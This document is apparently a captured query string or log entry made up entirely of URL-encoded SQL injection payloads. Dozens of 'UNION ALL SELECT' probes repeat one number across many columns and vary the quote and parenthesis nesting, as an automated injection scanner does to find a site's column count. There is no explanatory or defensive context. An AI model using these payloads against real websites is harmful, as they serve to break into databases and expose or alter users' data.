-6153%27%29%20UNION%20ALL%20SELECT%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138%2C%201138--%20%20AND%20%28%27zxSt%27%20LIKE%20%27zxSt -8600%27%29%20UNION%20ALL%20SELECT%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915%2C%203915--%20%20AND%20%28%27gDPR%27%20LIKE%20%27gDPR -6191%27%29%29%20UNION%20ALL%20SELECT%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702%2C%203702--%20%20AND%20%28%28%27qbRB%27%20LIKE%20%27qbRB -9124%27%29%29%20UNION%20ALL%20SELECT%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861%2C%201861--%20%20AND%20%28%28%27gsXL%27%20LIKE%20%27gsXL -2704%27%29%29%20UNION%20ALL%20SELECT%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094%2C%208094--%20%20AND%20%28%28%27DaXB%27%20LIKE%20%27DaXB -9007%27%29%29%20UNION%20ALL%20SELECT%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593--%20%20AND%20%28%28%27kOuC%27%20LIKE%20%27kOuC -6577%27%29%29%20UNION%20ALL%20SELECT%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474%2C%205474--%20%20AND%20%28%28%27syon%27%20LIKE%20%27syon -3190%27%29%29%20UNION%20ALL%20SELECT%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605%2C%205605--%20%20AND%20%28%28%27RhZt%27%20LIKE%20%27RhZt -1144%27%29%29%20UNION%20ALL%20SELECT%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941--%20%20AND%20%28%28%27GqSr%27%20LIKE%20%27GqSr -5780%27%29%29%20UNION%20ALL%20SELECT%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995%2C%207995--%20%20AND%20%28%28%27doYx%27%20LIKE%20%27doYx -2259%27%29%29%20UNION%20ALL%20SELECT%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089--%20%20AND%20%28%28%27nImX%27%20LIKE%20%27nImX -9822%27%29%29%20UNION%20ALL%20SELECT%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613%2C%201613--%20%20AND%20%28%28%27jXSu%27%20LIKE%20%27jXSu -5906%27%29%29%29%20UNION%20ALL%20SELECT%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216%2C%209216--%20%20AND%20%28%28%28%27bCVq%27%20LIKE%20%27bCVq -7096%27%29%29%29%20UNION%20ALL%20SELECT%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412%2C%207412--%20%20AND%20%28%28%28%27BmhD%27%20LIKE%20%27BmhD -6430%27%29%29%29%20UNION%20ALL%20SELECT%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136%2C%209136--%20%20AND%20%28%28%28%27NkKX%27%20LIKE%20%27NkKX -6928%27%29%29%29%20UNION%20ALL%20SELECT%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860%2C%207860--%20%20AND%20%28%28%28%27FEFM%27%20LIKE%20%27FEFM -3036%27%29%29%29%20UNION%20ALL%20SELECT%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169%2C%205169--%20%20AND%20%28%28%28%27wHkI%27%20LIKE%20%27wHkI -1102%27%29%29%29%20UNION%20ALL%20SELECT%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084%2C%202084--%20%20AND%20%28%28%28%27FAIr%27%20LIKE%20%27FAIr -5196%27%29%29%29%20UNION%20ALL%20SELECT%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022--%20%20AND%20%28%28%28%27ipNx%27%20LIKE%20%27ipNx -7435%27%29%29%29%20UNION%20ALL%20SELECT%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487%2C%204487--%20%20AND%20%28%28%28%27XiYC%27%20LIKE%20%27XiYC -1792%27%29%29%29%20UNION%20ALL%20SELECT%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983%2C%203983--%20%20AND%20%28%28%28%27EjCi%27%20LIKE%20%27EjCi -1516%27%29%29%29%20UNION%20ALL%20SELECT%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370--%20%20AND%20%28%28%28%27pxdM%27%20LIKE%20%27pxdM -3195%27%20UNION%20ALL%20SELECT%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586--%20%20AND%20%27mCZd%27%20LIKE%20%27mCZd -4237%27%20UNION%20ALL%20SELECT%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950%2C%205950--%20%20AND%20%27ulex%27%20LIKE%20%27ulex -9725%27%20UNION%20ALL%20SELECT%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882%2C%207882--%20%20AND%20%27VBKw%27%20LIKE%20%27VBKw -4882%27%20UNION%20ALL%20SELECT%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473%2C%209473--%20%20AND%20%27yUCf%27%20LIKE%20%27yUCf -9387%27%20UNION%20ALL%20SELECT%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798--%20%20AND%20%27Mpes%27%20LIKE%20%27Mpes -6632%27%20UNION%20ALL%20SELECT%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789%2C%206789--%20%20AND%20%27iVkI%27%20LIKE%20%27iVkI -2114%27%20UNION%20ALL%20SELECT%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926%2C%208926--%20%20AND%20%27ivyZ%27%20LIKE%20%27ivyZ -9183%27%20UNION%20ALL%20SELECT%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287%2C%207287--%20%20AND%20%27XHSW%27%20LIKE%20%27XHSW -4188%27%20UNION%20ALL%20SELECT%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254%2C%203254--%20%20AND%20%27iutr%27%20LIKE%20%27iutr -2104%27%20UNION%20ALL%20SELECT%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340%2C%203340--%20%20AND%20%27hkdF%27%20LIKE%20%27hkdF -2557%22%29%20UNION%20ALL%20SELECT%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309%2C%205309--%20%20AND%20%28%22MCmo%22%3D%22MCmo -6783%22%29%20UNION%20ALL%20SELECT%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185%2C%207185--%20%20AND%20%28%22mERX%22%3D%22mERX -8200%22%29%20UNION%20ALL%20SELECT%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764%2C%208764--%20%20AND%20%28%22TAxM%22%3D%22TAxM -2276%22%29%20UNION%20ALL%20SELECT%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378%2C%203378--%20%20AND%20%28%22rLBp%22%3D%22rLBp -2360%22%29%20UNION%20ALL%20SELECT%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973%2C%202973--%20%20AND%20%28%22vYVn%22%3D%22vYVn -7279%22%29%20UNION%20ALL%20SELECT%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880%2C%202880--%20%20AND%20%28%22zvGQ%22%3D%22zvGQ -8272%22%29%20UNION%20ALL%20SELECT%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855%2C%202855--%20%20AND%20%28%22qYyj%22%3D%22qYyj -5240%22%29%20UNION%20ALL%20SELECT%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641%2C%207641--%20%20AND%20%28%22njAc%22%3D%22njAc -9454%22%29%20UNION%20ALL%20SELECT%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977%2C%209977--%20%20AND%20%28%22vmCc%22%3D%22vmCc -2844%22%29%20UNION%20ALL%20SELECT%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344%2C%203344--%20%20AND%20%28%22ADzA%22%3D%22ADzA -6868%22%29%29%20UNION%20ALL%20SELECT%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920%2C%202920--%20%20AND%20%28%28%22NMbZ%22%3D%22NMbZ -9943%22%29%29%20UNION%20ALL%20SELECT%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058%2C%208058--%20%20AND%20%28%28%22kKVg%22%3D%22kKVg -2353%22%29%29%20UNION%20ALL%20SELECT%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470%2C%201470--%20%20AND%20%28%28%22hiuD%22%3D%22hiuD -3102%22%29%29%20UNION%20ALL%20SELECT%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623%2C%204623--%20%20AND%20%28%28%22rtFP%22%3D%22rtFP 